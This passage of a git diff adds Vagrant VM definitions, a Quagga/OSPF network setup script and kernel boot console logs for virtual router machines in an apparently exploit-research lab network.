scheme... +[ OK ] Started Serial Getty on ttyS0. +[ OK ] Reached target Login Prompts. + Starting Apply the settings specified in cloud-config... +[ OK ] Started LSB: start and stop the Quagga routing suite. +[ OK ] Started LSB: automatic crash report generation. +[ OK ] Started LSB: Set the CPU Frequency Scaling governor to "ondemand". +[ OK ] Started LSB: daemon to balance interrupts for SMP systems. +[ OK ] Started Set console scheme. +[ OK ] Reached target Multi-User System. +[ OK ] Reached target Graphical Interface. + Starting Update UTMP about System Runlevel Changes... +[ OK ] Started Update UTMP about System Runlevel Changes. +[ 27.074370] cloud-init[1604]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'modules:config' at Mon, 25 Jan 2021 22:38:40 +0000. Up 26.85 seconds. +[ OK ] Started Apply the settings specified in cloud-config. + Starting Execute cloud user/final scripts... +[ 27.980290] cloud-init[1618]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'modules:final' at Mon, 25 Jan 2021 22:38:41 +0000. Up 27.80 seconds. +[ 28.010860] cloud-init[1618]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 finished at Mon, 25 Jan 2021 22:38:41 +0000. Datasource DataSourceNoCloud [seed=/dev/sdb][dsmode=net]. Up 27.97 seconds +[ OK ] Started Execute cloud user/final scripts. +[ OK ] Reached target Cloud-init target. + +Ubuntu 16.04.7 LTS router22 ttyS0 + +router22 login: \ No newline at end of file diff --git a/virtual-test-environment/routers/router3/.vagrant/machines/default/virtualbox/vagrant_cwd b/virtual-test-environment/routers/router3/.vagrant/machines/default/virtualbox/vagrant_cwd new file mode 100644 index 0000000..929aaec --- /dev/null +++ b/virtual-test-environment/routers/router3/.vagrant/machines/default/virtualbox/vagrant_cwd @@ -0,0 +1 @@ +/home/jive/space/gittin/VeepExploit/virt-lab/routers/router3 \ No newline at end of file diff --git a/virtual-test-environment/routers/router3/Vagrantfile b/virtual-test-environment/routers/router3/Vagrantfile new file mode 100644 index 0000000..60e8d1d --- /dev/null +++ b/virtual-test-environment/routers/router3/Vagrantfile @@ -0,0 +1,21 @@ +# -*- mode: ruby -*- + +# vi: set ft=ruby : + +Vagrant.configure(2) do |config| + config.vm.box = "ubuntu/xenial64" + config.vm.hostname = "vague-router3" + + config.vm.network "forwarded_port", guest: 22, host: 22116, id: 'ssh' + config.ssh.insert_key = true + config.vm.network "private_network", ip: "192.168.3.254", virtualbox__intnet: "intnet-3" + config.vm.network "private_network", ip: "192.168.101.1", virtualbox__intnet: "intnet-101" + config.vm.network "private_network", ip: "192.168.102.1", virtualbox__intnet: "intnet-102" + + config.vm.provider "virtualbox" do |vb| + vb.name = "vague-router3" + end + + config.vm.provision :shell, path: "setup_net.sh" + +end diff --git a/virtual-test-environment/routers/router3/setup_net.sh b/virtual-test-environment/routers/router3/setup_net.sh new file mode 100755 index 0000000..f2abb0e --- /dev/null +++ b/virtual-test-environment/routers/router3/setup_net.sh @@ -0,0 +1,62 @@ +#!/bin/bash +# + +OLD_NAME=vague-router +HNAME=router3 + +sed -i "s/$OLD_NAME/$HNAME/g" /etc/hostname +sed -i "s/$OLD_NAME/$HNAME/g" /etc/hosts +hostname $HNAME +apt-get update +apt-get install quagga quagga-doc traceroute +cp /usr/share/doc/quagga/examples/zebra.conf.sample /etc/quagga/zebra.conf +cp /usr/share/doc/quagga/examples/ospfd.conf.sample /etc/quagga/ospfd.conf +chown quagga.quaggavty /etc/quagga/*.conf +chmod 640 /etc/quagga/*.conf +sed -i s'/zebra=no/zebra=yes/' /etc/quagga/daemons +sed -i s'/ospfd=no/ospfd=yes/' /etc/quagga/daemons +echo 'VTYSH_PAGER=more' >>/etc/environment +echo 'export VTYSH_PAGER=more' >>/etc/bash.bashrc +cat >> /etc/quagga/ospfd.conf << EOF +interface enp0s8 +interface enp0s9 +interface enp0s10 +interface lo +router ospf + passive-interface enp0s8 + network 192.168.3.0/24 area 0.0.0.0 + network 192.168.101.0/24 area 0.0.0.0 + network 192.168.102.0/24 area 0.0.0.0 +line vty +EOF +cat >> /etc/quagga/zebra.conf << EOF +interface enp0s8 + ip address 192.168.3.254/24 + ipv6 nd suppress-ra +interface enp0s9 + ip address 192.168.101.1/24 + ipv6 nd suppress-ra +interface enp0s10 + ip address 192.168.102.1/24 + ipv6 nd suppress-ra +interface lo +ip forwarding +line vty +EOF +/etc/init.d/quagga start + +# Disable rp_filter and enable forwarding for routers +# +echo "net.ipv4.ip_forward=1" >> /etc/sysctl.conf + +echo "net.ipv4.conf.all.rp_filter=0" >> /etc/sysctl.conf +echo "net.ipv4.conf.default.rp_filter=0" >> /etc/sysctl.conf +echo "net.ipv4.conf.lo.rp_filter=0" >> /etc/sysctl.conf +echo "net.ipv4.conf.enp0s3.rp_filter=0" >> /etc/sysctl.conf +echo "net.ipv4.conf.enp0s8.rp_filter=0" >> /etc/sysctl.conf +echo "net.ipv4.conf.enp0s9.rp_filter=0" >> /etc/sysctl.conf +echo "net.ipv4.conf.enp0s10.rp_filter=0" >> /etc/sysctl.conf + +sysctl -p + +exit diff --git a/virtual-test-environment/routers/router3/ubuntu-xenial-16.04-cloudimg-console.log b/virtual-test-environment/routers/router3/ubuntu-xenial-16.04-cloudimg-console.log new file mode 100644 index 0000000..f16ecc6 --- /dev/null +++ b/virtual-test-environment/routers/router3/ubuntu-xenial-16.04-cloudimg-console.log @@ -0,0 +1,663 @@ +[ 0.000000] Initializing cgroup subsys cpuset +[ 0.000000] Initializing cgroup subsys cpu +[ 0.000000] Initializing cgroup subsys cpuacct +[ 0.000000] Linux version 4.4.0-190-generic (buildd@lcy01-amd64-026) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.12) ) #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 (Ubuntu 4.4.0-190.220-generic 4.4.233) +[ 0.000000] Command line: BOOT_IMAGE=/boot/vmlinuz-4.4.0-190-generic root=LABEL=cloudimg-rootfs ro console=tty1 console=ttyS0 +[ 0.000000] KERNEL supported cpus: +[ 0.000000] Intel GenuineIntel +[ 0.000000] AMD AuthenticAMD +[ 0.000000] Centaur CentaurHauls +[ 0.000000] x86/fpu: xstate_offset[2]: 576, xstate_sizes[2]: 256 +[ 0.000000] x86/fpu: Supporting XSAVE feature 0x01: 'x87 floating point registers' +[ 0.000000] x86/fpu: Supporting XSAVE feature 0x02: 'SSE registers' +[ 0.000000] x86/fpu: Supporting XSAVE feature 0x04: 'AVX registers' +[ 0.000000] x86/fpu: Enabled xstate features 0x7, context size is 832 bytes, using 'standard' format. +[ 0.000000] e820: BIOS-provided physical RAM map: +[ 0.000000] BIOS-e820: [mem 0x0000000000000000-0x000000000009fbff] usable +[ 0.000000] BIOS-e820: [mem 0x000000000009fc00-0x000000000009ffff] reserved +[ 0.000000] BIOS-e820: [mem 0x00000000000f0000-0x00000000000fffff] reserved +[ 0.000000] BIOS-e820: [mem 0x0000000000100000-0x000000003ffeffff] usable +[ 0.000000] BIOS-e820: [mem 0x000000003fff0000-0x000000003fffffff] ACPI data +[ 0.000000] BIOS-e820: [mem 0x00000000fec00000-0x00000000fec00fff] reserved +[ 0.000000] BIOS-e820: [mem 0x00000000fee00000-0x00000000fee00fff] reserved +[ 0.000000] BIOS-e820: [mem 0x00000000fffc0000-0x00000000ffffffff] reserved +[ 0.000000] NX (Execute Disable) protection: active +[ 0.000000] SMBIOS 2.5 present. +[ 0.000000] Hypervisor detected: KVM +[ 0.000000] e820: last_pfn = 0x3fff0 max_arch_pfn = 0x400000000 +[ 0.000000] MTRR: Disabled +[ 0.000000] x86/PAT: MTRRs disabled, skipping PAT initialization too. +[ 0.000000] CPU MTRRs all blank - virtualized system. +[ 0.000000] x86/PAT: Configuration [0-7]: WB WT UC- UC WB WT UC- UC +[ 0.000000] found SMP MP-table at [mem 0x0009fff0-0x0009ffff] mapped at [ffff88000009fff0] +[ 0.000000] Scanning 1 areas for low memory corruption +[ 0.000000] RAMDISK: [mem 0x362000-0x37167fff] +[ 0.000000] ACPI: Early table checksum verification disabled +[ 0.000000] ACPI: RSDP 0x00000000000E0000 000024 (v02 VBOX ) +[ 0.000000] ACPI: XSDT 0x000000003FFF0030 00003C (v01 VBOX VBOXXSDT 00000001 ASL 00000061) +[ 0.000000] ACPI: FACP 0x000000003FFF00F0 0000F4 (v04 VBOX VBOXFACP 00000001 ASL 00000061) +[ 0.000000] ACPI: DSDT 0x000000003FFF0470 0021FF (v02 VBOX VBOXBIOS 00000002 INTL 20180105) +[ 0.000000] ACPI: FACS 0x000000003FFF0200 000040 +[ 0.000000] ACPI: FACS 0x000000003FFF0200 000040 +[ 0.000000] ACPI: APIC 0x000000003FFF0240 00005C (v02 VBOX VBOXAPIC 00000001 ASL 00000061) +[ 0.000000] ACPI: SSDT 0x000000003FFF02A0 0001CC (v01 VBOX VBOXCPUT 00000002 INTL 20180105) +[ 0.000000] No NUMA configuration found +[ 0.000000] Faking a node at [mem 0x0000000000000000-0x000000003ffeffff] +[ 0.000000] NODE_DATA(0) allocated [mem 0x3ffeb000-0x3ffeffff] +[ 0.000000] kvm-clock: Using msrs 4b564d01 and 4b564d00 +[ 0.000000] kvm-clock: cpu 0, msr 0:3ffe3001, primary cpu clock +[ 0.000000] kvm-clock: using sched offset of 3655493780 cycles +[ 0.000000] clocksource: kvm-clock: mask: 0xffffffffffffffff max_cycles: 0x1cd42e4dffb, max_idle_ns: 881590591483 ns +[ 0.000000] Zone ranges: +[ 0.000000] DMA [mem 0x0000000000001000-0x0000000000ffffff] +[ 0.000000] DMA32 [mem 0x0000000001000000-0x000000003ffeffff] +[ 0.000000] Normal empty +[ 0.000000] Device empty +[ 0.000000] Movable zone start for each node +[ 0.000000] Early memory node ranges +[ 0.000000] node 0: [mem 0x0000000000001000-0x000000000009efff] +[ 0.000000] node 0: [mem 0x0000000000100000-0x000000003ffeffff] +[ 0.000000] Initmem setup node 0 [mem 0x0000000000001000-0x000000003ffeffff] +[ 0.000000] ACPI: PM-Timer IO Port: 0x4008 +[ 0.000000] IOAPIC[0]: apic_id 2, version 32, address 0xfec00000, GSI 0-23 +[ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl) +[ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 low level) +[ 0.000000] Using ACPI (MADT) for SMP configuration information +[ 0.000000] smpboot: Allowing 2 CPUs, 0 hotplug CPUs +[ 0.000000] PM: Registered nosave memory: [mem 0x00000000-0x00000fff] +[ 0.000000] PM: Registered nosavememory: [mem 0x0009f000-0x0009ffff] +[ 0.000000] PM: Registered nosave memory: [mem 0x000a0000-0x000effff] +[ 0.000000] PM: Registered nosave memory: [mem 0x000f0000-0x000fffff] +[ 0.000000] e820: [mem 0x40000000-0xfebfffff] available for PCI devices +[ 0.000000] Booting paravirtualized kernel on KVM +[ 0.000000] clocksource: refined-jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 7645519600211568 ns +[ 0.000000] setup_percpu: NR_CPUS:512 nr_cpumask_bits:512 nr_cpu_ids:2 nr_node_ids:1 +[ 0.000000] PERCPU: Embedded 33 pages/cpu @ffff88003fc00000 s95512 r8192 d31464 u1048576 +[ 0.000000] Built 1 zonelists in Node order, mobility grouping on. Total pages: 257912 +[ 0.000000] Policy zone: DMA32 +[ 0.000000] Kernel command line: BOOT_IMAGE=/boot/vmlinuz-4.4.0-190-generic root=LABEL=cloudimg-rootfs ro console=tty1 console=ttyS0 +[ 0.000000] PID hash table entries: 4096 (order: 3, 32768 bytes) +[ 0.000000] Memory: 997664K/1048120K available (8636K kernel code, 1337K rwdata, 4040K rodata, 1492K init, 1296K bss, 50456K reserved, 0K cma-rserved) +[ 0.000000] SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=2, Nodes=1 +[ 0.000000] Kernel/User page tables isolation: enabled +[ 0.000000] Hierarchical RCU implementation. +[ 0.000000] Build-time adjustment of leaf fanout to 64. +[ 0.000000] RCU restricting CPUs from NR_CPUS=512 to nr_cpu_ids=2. +[ 0.000000] RCU: Adjusting geometry for rcu_fanout_leaf=64, nr_cpu_ids=2 +[ 0.000000] NR_IRQS:33024 nr_irqs:440 16 +[ 0.000000] Console: colour VGA+ 80x25 +[ 0.000000] console [tty1] enabled +[ 0.000000] console [ttyS0] enabled +[ 0.000000] tsc: Detected 2207.998 MHz processor +[ 0.274840] Calibrating delay loop (skipped) preset value.. 4415.99 BogoMIPS (lpj=8831992) +[ 0.276771] pid_max: default: 32768 minimum: 301 +[ 0.277835] ACPI: Core revision 20150930 +[ 0.279978] ACPI: 2 ACPI AML tables successfully acquired and loaded +[ 0.292735] Security Framework initialized +[ 0.293736] Yama: becoming mindful. +[ 0.294616] AppArmor: AppArmor initialized +[ 0.295687] Dentry cache hash table entries: 131072 (order: 8, 1048576 bytes) +[ 0.297830] Inode-cache hash table entries: 65536 (order: 7, 524288 bytes) +[ 0.299357] Mount-cache hash table entries: 2048 (order: 2, 16384 bytes) +[ 0.300751] Mountpoint-cache hash table entries: 2048 (order: 2, 16384 bytes) +[ 0.307634] Initializing cgroup subsys io +[ 0.308590] Initializing cgroup subsys memory +[ 0.309685] Initializing cgroup subsys devices +[ 0.310727] Initializing cgroup subsys freezer +[ 0.311760] Initializing cgroup subsys net_cls +[ 0.312771] Initializing cgroup subsys perf_event +[ 0.313889] Initializing cgroup subsys net_prio +[ 0.314921] Initializing cgroup subsys hugetlb +[ 0.315939] Initializing cgroup subsys pids +[ 0.329902] mce: CPU supports 0 MCE banks +[ 0.330895] Last level iTLB entries: 4KB 64, 2MB 8, 4MB 8 +[ 0.332056] Last level dTLB entries: 4KB 64, 2MB 0, 4MB 0, 1GB 4 +[ 0.333328] Spectre V1 : Mitigation: usercopy/swapgs barriers and __user pointer sanitization +[ 0.335305] Spectre V2 : Mitigation: Full generic retpoline +[ 0.336512] Spectre V2 : Spectre v2 / SpectreRSB mitigation: Filling RSB on context switch +[ 0.338401] Speculative Store Bypass: Vulnerable +[ 0.339481] SRBDS: Unknown: Dependent on hypervisor status +[ 0.340764] MDS: Mitigation: Clear CPU buffers +[ 0.344522] Freeing SMP alternatives memory: 36K +[ 0.351833] ftrace: allocating 32339 entries in 127 pages +[ 0.419044] smpboot: APIC(0) Converting physical 0 to logical package 0 +[ 0.422966] smpboot: Max logical packages: 1 +[ 0.424391] x2apic enabled +[ 0.425479] Switched APIC routing to physical x2apic. +[ 0.431877] ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=-1 pin2=-1 +[ 0.541221] smpboot: CPU0: Intel(R) Core(TM) i3-8130U CPU @ 2.20GHz (family: 0x6, model: 0x8e, stepping: 0xa) +[ 0.546217] Performance Events: unsupported p6 CPU model 142 no PMU driver, software events only. +[ 0.563789] KVM setup paravirtual spinlock +[ 0.572256] x86: Booting SMP configuration: +[ 0.574132] .... node #0, CPUs: #1 +[ 0.590311] kvm-clock: cpu 1, msr 0:3ffe3041, secondary cpu clock +[ 0.622013] mce: CPU supports 0 MCE banks +[ 0.640940] x86: Booted up 1 node, 2 CPUs +[ 0.642888] smpboot: Total of 2 processors activated (8831.99 BogoMIPS) +[ 0.650012] devtmpfs: initialized +[ 0.654301] evm: security.selinux +[ 0.655749] evm: security.SMACK64 +[ 0.657187] evm: security.SMACK64EXEC +[ 0.658693] evm: security.SMACK64TRANSMUTE +[ 0.660561] evm: security.SMACK64MMAP +[ 0.662178] evm: security.ima +[ 0.663438] evm: security.capability +[ 0.672821] clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 7645041785100000 ns +[ 0.676738] futex hash table entries: 512 (order: 3, 32768 bytes) +[ 0.684509] pinctrl core: initialized pinctrl subsystem +[ 0.687040] RTC time: 22:38:11, date: 01/25/21 +[ 0.690110] NET: Registered protocol family 16 +[ 0.700907] cpuidle: using governor ladder +[ 0.720872] cpuidle: using governor menu +[ 0.722981] PCCT header not found. +[ 0.726663] ACPI: bus type PCI registered +[ 0.728842] acpiphp: ACPI Hot Plug PCI Controller Driver version: 0.5 +[ 0.734723] PCI: Using configuration type 1 for base access +[ 0.753699] ACPI: Added _OSI(Module Device) +[ 0.762898] ACPI: Added _OSI(Processor Device) +[ 0.765017] ACPI: Added _OSI(3.0 _SCP Extensions) +[ 0.771041] ACPI: Added _OSI(Processor Aggregator Device) +[ 0.776232] ACPI: Executed 1 blocks of module-level executable AML code +[ 0.788018] ACPI: Interpreter enabled +[ 0.796269] ACPI: (supports S0 S5) +[ 0.814577] ACPI: Using IOAPIC for interrupt routing +[ 0.823529] PCI: Using host bridge windows from ACPI; if necessary, use "pci=nocrs" and report a bug +[ 0.844058] ACPI: PCI Root Bridge [PCI0] (domain 0000 [bus 00-ff]) +[ 0.848988] acpi PNP0A03:00: _OSC: OS supports [ASPM ClockPM Segments MSI] +[ 0.863442] acpi PNP0A03:00: _OSC: not requesting OS control; OS requires [ExtendedConfig ASPM ClockPM MSI] +[ 0.893828] acpi PNP0A03:00: fail to add MMCONFIG information, can't access extended PCI configuration space under this bridge. +[ 0.940775] PCI host bridge to bus 0000:00 +[ 0.968510] pci_bus 0000:00: root bus resource [io 0x0000-0x0cf7 window] +[ 1.006749] pci_bus 0000:00: root bus resource [io 0x0d00-0xffff window] +[ 1.016201] pci_bus 0000:00: root bus resource [mem 0x000a0000-0x000bffff window] +[ 1.034671] pci_bus 0000:00: root bus resource [mem 0x40000000-0xfdffffff window] +[ 1.053925] pci_bus 0000:00: root bus resource [bus 00-ff] +[ 1.062092] pci 0000:00:01.1: legacy IDE quirk: reg 0x10: [io 0x01f0-0x01f7] +[ 1.076315] pci 0000:00:01.1: legacy IDE quirk: reg 0x14: [io 0x03f6] +[ 1.102100] pci 0000:00:01.1: legacy IDE quirk: reg 0x18: [io 0x0170-0x0177] +[ 1.146885] pci 0000:00:01.1: legacy IDE quirk: reg 0x1c: [io 0x0376] +[ 1.202622] pci 0000:00:07.0: quirk: [io 0x4000-0x403f] claimed by PIIX4 ACPI +[ 1.206136] pci 0000:00:07.0: quirk: [io 0x4100-0x410f] claimed by PIIX4 SMB +[ 1.265106] ACPI: PCI Interrupt Link [LNKA] (IRQs 5 9 10 *11) +[ 1.273369] ACPI: PCI Interrupt Link [LNKB] (IRQs 5 9 *10 11) +[ 1.287769] ACPI: PCI Interrupt Link [LNKC] (IRQs 5 *9 10 11) +[ 1.312673] ACPI: PCI Interrupt Link [LNKD] (IRQs 5 9 10 *11) +[ 1.327479] ACPI: Enabled 2 GPEs in block 00 to 07 +[ 1.359304] vgaarb: setting as boot device: PCI:0000:00:02.0 +[ 1.364865] vgaarb: device added: PCI:0000:00:02.0,decodes=io+mem,owns=io+mem,locks=none +[ 1.392342] vgaarb: loaded +[ 1.395596] vgaarb: bridge control possible 0000:00:02.0 +[ 1.404698] SCSI subsystem initialized +[ 1.412261] ACPI: bus type USB registered +[ 1.420137] usbcore: registered new interface driver usbfs +[ 1.441918] usbcore: registered new interface driver hub +[ 1.445723] usbcore: registered new device driver usb +[ 1.466940] PCI: Using ACPI for IRQ routing +[ 1.472805] NetLabel: Initializing +[ 1.476097] NetLabel: domain hash size = 128 +[ 1.494592] NetLabel: protocols = UNLABELED CIPSOv4 +[ 1.516638] NetLabel: unlabeled traffic allowed by default +[ 1.552796] amd_nb: Cannot enumerate AMD northbridges +[ 1.577188] clocksource: Switched to clocksource kvm-clock +[ 1.606658] AppArmor AppArmor FilesysteEnabled +[ 1.804765] pnp: PnP ACPI ini +[ 1.868259] pnp: PnP ACPI: found 3 devices + +[ 1.887752] clocksource: acpi_pm: msk:0xffffff max_cycles: 0xffffff, max_idle_ns: 20857024 ns +[ 2.140897] NET: Regisered protocol family 2 + +[ 2.210657] TCP established hash table entries: 8192 (order: 4, 65536 bytes) +[ 2.223067] TCP bind hash table entries: 8192 (order: 5, 131072 bytes) +[ 2.224722] TCP: ash tables configured (established 8192 bind 8192) +[ 2.304118] UDP hash table entries: 512 (order: 2, 16384 bytes) +[ 2.344935] UDP-Lite hash table entries: 512 (order: 2, 16384 byts) +[ 2.410724] NET: Registered protocol family 1 +[ 2.414911] pci 0000:00:00.0: Limiting direct PCI/PCI transfers +[ 2.416292] pci 0000:00:01.0: Activating ISA DMA hang workarunds +[ 494145] Unpacking initramfs... + +[ 3.205804] Freeing initrd memory: 14880K +[ 3.207790] clocksource: tsc: mask: 0xffffffffffffffff max_cycles: 0x1fd3b6211b4, max_idle_ns: 440795230313 ns +[ 3.223716] platform rtc_cmos: registered platform RTC device (no PNP device found) +[ 3.227245] Scanning for low memory corruption every 60 seconds +[ 3.243621] audit: initializing netlink subsys (disabled) +[ 3.246080] audit: type=2000 audit(1611614298.677:1): initialized +[ 3.252534] Initialise system trusted keyring +[ 3.255117] HugeTLB registered 2 MB page size, pre-allocated 0 pages +[ 3.266326] zbud: loaded +[ 3.268069] VFS: Disk quotas dquot_6.6.0 +[ 3.270169] VFS: Dquot-cache hash table entries: 512 (order 0, 4096 bytes) +[ 3.278836] squashfs: version 4.0 (2009/01/31) Phillip Lougher +[ 3.281752] fuse init (API version 7.23) +[ 3.284812] Key type big_key registered +[ 3.288545] Allocating IMA MOK and blacklist keyrings. +[ 3.315763] Key type asymmetric registered +[ 3.331251] Asymmetric key parser 'x509' registered +[ 3.333455] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 249) +[ 3.346327] io scheduler noop registered +[ 3.348172] io scheduler deadline registered (default) +[ 3.354152] io scheduler cfq registered +[ 3.355956] pci_hotplug: PCI Hot Plug PCI Core version: 0.5 +[ 3.358614] pciehp: PCI Express Hot Plug Controller Driver version: 0.4 +[ 3.364977] ACPI: AC Adapter [AC] (on-line) +[ 3.366673] input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input0 +[ 3.373695] ACPI: Power Button [PWRF] +[ 3.376880] input: Sleep Button as /devices/LNXSYSTM:00/LNXSLPBN:00/input/input1 +[ 3.382417] ACPI: Sleep Button [SLPF] +[ 3.391051] ACPI: Battery Slot [BAT0] (battery present) +[ 3.393440] GHES: HEST is not enabled! +[ 3.395433] Serial: 8250/16550 driver, 32 ports, IRQ sharing enabled +[ 3.420440] 00:02: ttyS0 at I/O 0x3f8 (irq = 4, base_baud = 115200) is a 16550A +[ 3.424912] Linux agpgart interface v0.103 +[ 3.437937] loop: module loaded +[ 3.443153] scsi host0: ata_piix +[ 3.444738] scsi host1: ata_piix +[ 3.446189] ata1: PATA max UDMA/33 cmd 0x1f0 ctl 0x3f6 bmdma 0xd000 irq 14 +[ 3.449270] ata2: PATA max UDMA/33 cmd 0x170 ctl 0x376 bmdma 0xd008 irq 15 +[ 3.457147] libphy: Fixed MDIO Bus: probed +[ 3.459147] tun: Universal TUN/TAP device driver, 1.6 +[ 3.461132] tun: (C) 1999-2004 Max Krasnyansky +[ 3.463570] PPP generic driver version 2.4.2 +[ 3.465417] ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver +[ 3.468106] ehci-pci: EHCI PCI platform driver +[ 3.469931] ehci-platform: EHCI generic platform driver +[ 3.472088] ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver +[ 3.474124] ohci-pci: OHCI PCI platform driver +[ 3.475638] ohci-platform: OHCI generic platform driver +[ 3.477666] uhci_hcd: USB Universal Host Controller Interface driver +[ 3.480279] i8042: PNP: PS/2 Controller [PNP0303:PS2K,PNP0f03:PS2M] at 0x60,0x64 irq 1,12 +[ 3.487313] serio: i8042 KBD port at 0x60,0x64 irq 1 +[ 3.489184] serio: i8042 AUX port at 0x60,0x64 irq 12 +[ 3.491201] mousedev: PS/2 mouse device common for all mice +[ 3.500245] rtc_cmos rtc_cmos: rtc core: registered rtc_cmos as rtc0 +[ 3.502777] rtc_cmos rtc_cmos: alarms up to one day, 114 bytes nvram +[ 3.505087] i2c /dev entries driver +[ 3.509845] device-mapper: uevent: version 1.0.3 +[ 3.511765] device-mapper: ioctl: 4.34.0-ioctl (2015-10-28) initialised: dm-devel@redhat.com +[ 3.515048] ledtrig-cpu: registered to indicate activity on CPUs +[ 3.516279] input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input2 +[ 3.523176] NET: Registered protocol family 10 +[ 3.526956] NET: Registered protocol family 17 +[ 3.528678] Key type dns_resolver registered +[ 3.530800] registered taskstats version 1 +[ 3.532445] Loading compiled-in X.509 certificates +[ 3.534962] Loaded X.509 cert 'Build time autogenerated kernel key: b89e9ea735e1dbde81c7786f041ecf1d53e71c2e' +[ 3.538748] zswap: loaded using pool lzo/zbud +[ 3.548785] Key type trusted registered +[ 3.555688] Key type encrypted registered +[ 3.557363] AppArmor: AppArmor sha1 policy hashing enabled +[ 3.559421] ima: No TPM chip found, activating TPM-bypass! +[ 3.561563] ima: Allocated hash algorithm: sha1 +[ 3.563383] evm: HMAC attrs: 0x1 +[ 3.566978] Magic number: 5:763:654 +[ 3.568573] rtc_cmos rtc_cmos: setting system clock to 2021-01-25 22:38:14 UTC (1611614294) +[ 3.575511] BIOS EDD facility v0.16 2004-Jun-25, 0 devices found +[ 3.577916] EDD information not available. +[ 3.621140] Freeing unused kernel memory: 1492K +[ 3.628240] Write protecting the kernel read-only data: 14336k +[ 3.630905] Freeing unused kernel memory: 1592K +[ 3.637366] Freeing unused kernel memory: 56K +Loading, please wait... +starting version 229 +[ 3.666999] random: udevadm: uninitialized urandom read (16 bytes read, 3 bits of entropy available) +[ 3.667523] random: systemd-udevd: uninitialized urandom read (16 bytes read, 3 bits of entropy available) +[ 3.667614] random: systemd-udevd: uninitialized urandom read (16 bytes read, 3 bits of entropy available) +[ 3.667636] random: systemd-udevd: uninitialized urandom read (16 bytes read, 3 bits of entropy available) +[ 3.667661] random: systemd-udevd: uninitialized urandom read (16 bytes read, 3 bits of entropy available) +[ 3.689344] random: udevadm: uninitialized urandom read (16 bytes read, 3 bits of entropy available) +[ 3.702111] random: systemd-udevd: uninitialized urandom read (16 bytes read, 3 bits of entropy available) +[ 3.716180] random: udevadm: uninitialized urandom read (16 bytes read, 3 bits of entropy available) +[ 3.716244] random: udevadm: uninitialized urandom read (16 bytes read, 3 bits of entropy available) +[ 3.716407] random: udevadm: uninitialized urandom read (16 bytes read, 3 bits of entropy available) +[ 4.002861] e1000: Intel(R) PRO/1000 Network Driver - version 7.3.21-k8-NAPI +[ 4.016393] e1000: Copyright (c) 1999-2006 Intel Corporation. +[ 4.039783] Fusion MPT base driver 3.04.20 +[ 4.046033] Copyright (c) 1999-2008 LSI Corporation +[ 4.099773] Fusion MPT SPI Host driver 3.04.20 +[ 4.117707] AVX2 version of gcm_enc/dec engaged. +[ 4.121558] AES CTR mode by8 optimization enabled +[ 4.435411] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input4 +[ 5.230251] e1000 0000:00:03.0 eth0: (PCI:33MHz:32-bit) 02:83:3c:85:18:ff +[ 5.235481] e1000 0000:00:03.0 eth0: Intel(R) PRO/1000 Network Connection +[ 6.216961] e1000 0000:00:08.0 eth1: (PCI:33MHz:32-bit) 08:00:27:24:a8:61 +[ 6.222149] e1000 0000:00:08.0 eth1: Intel(R) PRO/1000 Network Connection +[ 6.236751] mptbase: ioc0: Initiating bringup +[ 6.301432] ioc0: LSI53C1030 A0: Capabilities={Initiator} +[ 6.462564] scsi host2: ioc0: LSI53C1030 A0, FwRev=00000000h, Ports=1, MaxQ=256, IRQ=20 +[ 6.576699] scsi 2:0:0:0: Direct-Access VBOX HARDDISK 1.0 PQ: 0 ANSI: 5 +[ 6.578396] scsi target2:0:0: Beginning Domain Validation +[ 6.581996] scsi target2:0:0: Domain Validation skipping write tests +[ 6.584900] scsi target2:0:0: Ending Domain Validation +[ 6.588367] scsi target2:0:0: asynchronous +[ 6.594895] scsi 2:0:1:0: Direct-Access VBOX HARDDISK 1.0 PQ: 0 ANSI: 5 +[ 6.597172] scsi target2:0:1: Beginning Domain Validation +[ 6.605994] scsi target2:0:1: Domain Validation skipping write tests +[ 6.639483] scsi target2:0:1: Ending Domain Validation +[ 6.646477] scsi target2:0:1: asynchronous +[ 6.666810] sd 2:0:0:0: Attached scsi generic sg0 type 0 +[ 6.669347] sd 2:0:0:0: [sda] 20971520 512-byte logical blocks: (10.7 GB/10.0 GiB) +[ 6.669787] sd 2:0:0:0: [sda] Write Protect is off +[ 6.669855] sd 2:0:0:0: [sda] Incomplete mode parameter data +[ 6.669856] sd 2:0:0:0: [sda] Assuming drive cache: write through +[ 6.699332] sd 2:0:1:0: Attached scsi generic sg1 type 0 +[ 6.703973] sd 2:0:1:0: [sdb] 20480 512-byte logical blocks: (10.5 MB/10.0 MiB) +[ 6.711201] sd 2:0:1:0: [sdb] Write Protect is off +[ 6.714802] sd 2:0:1:0: [sdb] Incomplete mode parameter data +[ 6.716823] sd 2:0:1:0: [sdb] Assuming drive cache: write through +[ 6.718974] sda: sda1 +[ 6.744441] sd 2:0:0:0: [sda] Attached SCSI disk +[ 6.750830] sd 2:0:1:0: [sdb] Attached SCSI disk +[ 7.242079] e1000 0000:00:09.0 eth2: (PCI:33MHz:32-bit) 08:00:27:53:ea:3b +[ 7.286736] e1000 0000:00:09.0 eth2: Intel(R) PRO/1000 Network Connection +[ 8.235376] e1000 0000:00:0a.0 eth3: (PCI:33MHz:32-bit) 08:00:27:55:78:35 +[ 8.249572] e1000 0000:00:0a.0 eth3: Intel(R) PRO/1000 Network Connection +[ 8.258423] e1000 0000:00:08.0 enp0s8: renamed from eth1 +[ 8.273173] e1000 0000:00:09.0 enp0s9: renamed from eth2 +[ 8.305666] e1000 0000:00:0a.0 enp0s10: renamed from eth3 +[ 8.353299] e1000 0000:00:03.0 enp0s3: renamed from eth0 +Begin: 